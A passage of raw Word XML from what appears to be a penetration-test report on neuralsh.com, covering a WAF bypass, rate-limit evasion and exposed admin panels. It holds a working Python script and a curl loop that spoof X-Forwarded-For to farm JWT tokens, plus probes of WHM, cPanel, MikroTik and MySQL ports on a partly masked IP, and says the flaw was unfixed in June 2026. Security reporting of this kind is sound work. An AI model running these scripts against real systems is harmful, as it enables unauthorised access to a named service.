              <w:t>DENY</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X-Content-Type-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nosniff</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X-XSS-Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1; mode=block</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Referrer-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>strict-origin-when-cross-origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content-Security-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">script-src 'self' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'unsafe-inline'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Weak — N-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>unsafe-inline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directive in the CSP weakens XSS protection by allowing execution of inline script blocks. If an XSS vulnerability exists, the CSP would not prevent exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.4 Cloudflare WAF Bypass Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A critical test was confirming that direct connections to the origin IP bypass the Cloudflare WAF entirely. This was demonstrated using Burp Suite by sending the same request through Cloudflare and then directly to the origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2665321"/>
            <wp:docPr id="30" name="Picture 30"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig414a_burp_cloudflare.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2665321"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.14: Burp Suite — Cloudflare WAF bypass confirmation (cloudflare vs Apache headers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The WAF bypass was complete — any request sent to 103.16.xx.xxx directly is processed by the Apache web server without any Cloudflare filtering, logging, or protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.6 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploitation was conducted with the goal of confirming vulnerability severity through controlled proof-of-concept demonstrations. No data was modified or extracted, and all tests were bounded by the ethical constraints defined in Chapter 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.6.1 Rate Limit Bypass via X-Forwarded-For Header Spoofing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N-005 | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CVSS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9.1 (post-exploitation upgrade)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The hypothesis from the assessment phase was validated: the application tracks rate limits using the client-supplied </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> header rather than the real source IP. By providing a different random IP address as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> value on each request, the rate-limiting system treats each request as coming from a unique IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
        <w:br/>
        <w:t>import requests, random, time</w:t>
        <w:br/>
        <w:br/>
        <w:t>def random_ip():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return ".".join(str(random.randint(1, 254)) for _ in range(4))</w:t>
        <w:br/>
        <w:br/>
        <w:t>url = "https://neuralsh.com/web/v1/init/token"</w:t>
        <w:br/>
        <w:br/>
        <w:t>success_bypass = 0</w:t>
        <w:br/>
        <w:t>tokens = []</w:t>
        <w:br/>
        <w:t>for i in range(50):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    fake_ip = random_ip()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    headers = {"X-Forwarded-For": fake_ip, "X-Real-IP": fake_ip}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r = requests.get(url, headers=headers)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if r.status_code == 200:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        success_bypass += 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        tokens.append(r.json().get("token"))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    time.sleep(0.05)</w:t>
        <w:br/>
        <w:br/>
        <w:t>print(f"Tokens collected: {success_bypass}/50 — Rate limits triggered: 0")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rP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Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tokens Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rate Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Without bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>18 / 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Yes — request 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>With X-Forwarded-For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>50 / 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>None — 100% bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2168250"/>
            <wp:docPr id="31" name="Picture 31"/>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4.15: Rate limit bypass — fifty/fifty tokens, zero rate-limit responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.6.2 JWT Token Farming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Finding:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> N-007 | Using the bypass from 4.6.1, 50 valid signed JWT tokens were collected in approximately three seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for i in $(seq 1 50); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IP=$(python3 -c "import random; print(f'{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}')")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    curl -s -H "X-Forwarded-For: $IP" https://neuralsh.com/web/v1/init/token | jq -r '.token'</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Each token was tested against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/category</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/text/search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — both accepted guest tokens successfully, confirming the tokens granted real API access. A follow-up verification on 11 June 2026 confirmed the endpoint remains live and continues to return HTTP 200 with a valid signed JWT token, indicating that no remediation has been applied since the original finding was documented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="998595"/>
            <wp:docPr id="32" name="Picture 32"/>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4.16: JWT endpoint confirmed live — HTTP 200 as of eleven June 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.6.3 Admin Panel Access Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All four critical admin panels were confirmed accessible without authentication:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># WHM — root server administration</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.xx.xxx:2087/ | grep -i title</w:t>
        <w:br/>
        <w:t># &lt;title&gt;WHM Login&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># cPanel — hosting account control</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.xx.xxx:2083/ | grep -i title</w:t>
        <w:br/>
        <w:t># &lt;title&gt;cPanel Login&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># MikroTik — network device management</w:t>
        <w:br/>
        <w:t>curl -v http://103.16.xx.xxx:9001/ 2&gt;&amp;1 | grep "title"</w:t>
        <w:br/>
        <w:t># &lt;title&gt;RouterOS router configuration page&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># MySQL — direct database access</w:t>
        <w:br/>
        <w:t>mysql -h 103.16.xx.xxx -P 3306 -u root 2&gt;&amp;1 | head -1</w:t>
        <w:br/>
        <w:t># ERROR 1045 (28000): Access denied (confirms port accepts public connections)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Full exploitation of WHM, cPanel, and MikroTik via browser-based login flows was documented in a video component of this assessment. The panels are publicly accessible with no IP restriction and no two-factor authentication requirement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.7 Post-Exploitation Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Post-exploitation analysis was conducted in read-only mode to trace the realistic impact paths available after initial access through the identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.7.1 Shared Hosting Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The combination of SSL certificate evidence and HTTP redirect behavior confirmed that multiple organizations share the same physical server. On shared cPanel hosting, a compromise at the WHM level does not affect only neuralsh.com:</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Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM credentials obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Full control of ALL hosted accounts on server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Root MySQL credentials obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
